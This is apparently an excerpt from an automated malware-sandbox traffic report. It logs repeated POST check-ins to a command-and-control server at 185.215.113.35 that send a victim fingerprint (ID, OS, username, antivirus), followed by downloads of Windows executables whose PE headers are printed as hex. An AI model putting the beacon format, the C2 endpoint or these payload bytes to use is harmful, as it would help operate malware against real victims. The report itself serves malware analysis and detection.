                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:15 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:18 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 11:29:01 GMTETag: "4e200-5d5891c0fb88d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f0 14 cc 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e8 03 00 00 a8 11 00 00 00 00 00 20 b6 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 27 b3 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e3 03 00 28 00 00 00 00 00 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 fc 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ce e6 03 00 00 10 00 00 00 e8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 61 73 00 00 00 00 05 00 00 00 00 d0 14 00 00 02 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 76 65 00 00 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 06 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 69 79 65 76 6f 6c 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 00 15 00 00 84 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 46 00 00 00 90 15 00 00 48 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:22 GMTContent-Type: application/x-msdos-programContent-Length: 323072Connection: closeLast-Modified: Fri, 14 Jan 2022 11:29:01 GMTETag: "4ee00-5d5891c0e418d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c8 56 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f4 03 00 00 a8 11 00 00 00 00 00 40 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 96 8b 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ee f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 75 74 61 6c 61 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 76 65 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 65 00 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 46 00 00 00 a0 15 00 00 48 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:02 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 